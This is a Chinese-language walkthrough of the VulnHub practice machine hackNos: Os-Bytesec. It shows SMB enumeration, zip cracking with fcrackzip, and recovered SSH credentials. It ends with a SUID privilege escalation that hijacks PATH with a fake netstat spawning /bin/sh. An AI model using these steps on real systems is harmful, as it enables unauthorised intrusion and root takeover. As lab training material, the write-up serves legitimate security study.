vulnhub靶场之hackNos:Os-Bytesec

难度:中级
标记:2标记第一个用户和第二个根
学习:利用| 中小企业| 枚举 速记| 特权提升
联系…https://www.linkedin.com/in/rahulgehlaut/

我们建议您对此虚拟机使用VirtualBox而不是VMware
vulnhub靶场之hackNos:Os-Bytesec
vulnhub靶场之hackNos:Os-Bytesec
做了端口扫描,发现开了 80 ,139 ,445 ,2525 这里可能有SMB共享。
2525是SSH。
vulnhub靶场之hackNos:Os-Bytesec
查看页面源代码 ,发现提示 get smb free SMB共享。
再拿MSF做SMB扫描。
vulnhub靶场之hackNos:Os-Bytesec
这里爆出一个用户名为smb的共享用户。
vulnhub靶场之hackNos:Os-Bytesec
在kali上用smbclient连接。
smbclient //192.168.0.107/smb -U smb
vulnhub靶场之hackNos:Os-Bytesec
get main.txt
get safe.zip
vulnhub靶场之hackNos:Os-Bytesec
这里看下main文件,只是一个Hello.
vulnhub靶场之hackNos:Os-Bytesec
发现zip需要密码 用fcrackzip**。
apt-get install fcrackzip
fcrackzip -D are/wordlists/rockyou.txt -u safe.zip
vulnhub靶场之hackNos:Os-Bytesec
vulnhub靶场之hackNos:Os-Bytesec
这里有两个文件,这个user.cap是一个网络数据包文件,做到这里没思路了。
借鉴大佬的思路
writeup:
https://www.freebuf.com/articles/system/221949.html
需要用aircrack-ng** 无线数据包。
vulnhub靶场之hackNos:Os-Bytesec
账号:blackjax 密码 snowflake
ssh登录
vulnhub靶场之hackNos:Os-Bytesec
这里需要提权 ,也借鉴了大佬的思路,用PATH提权。
vulnhub靶场之hackNos:Os-Bytesec
在find命令的帮助下不浪费时间的搜索具有SUID或4000权限的文件。

find / -perm -u=s -type f 2>/dev/null
vulnhub靶场之hackNos:Os-Bytesec
然后我们进入/usr/bin ,./netscan

vulnhub靶场之hackNos:Os-Bytesec
然后
cd /tmp

echo “/bin/sh” > netstat

chmod 777 netstat

echo $PATH

export PATH=/tmp:$PATH

cd /usr/bin

./netscan

whoami
vulnhub靶场之hackNos:Os-Bytesec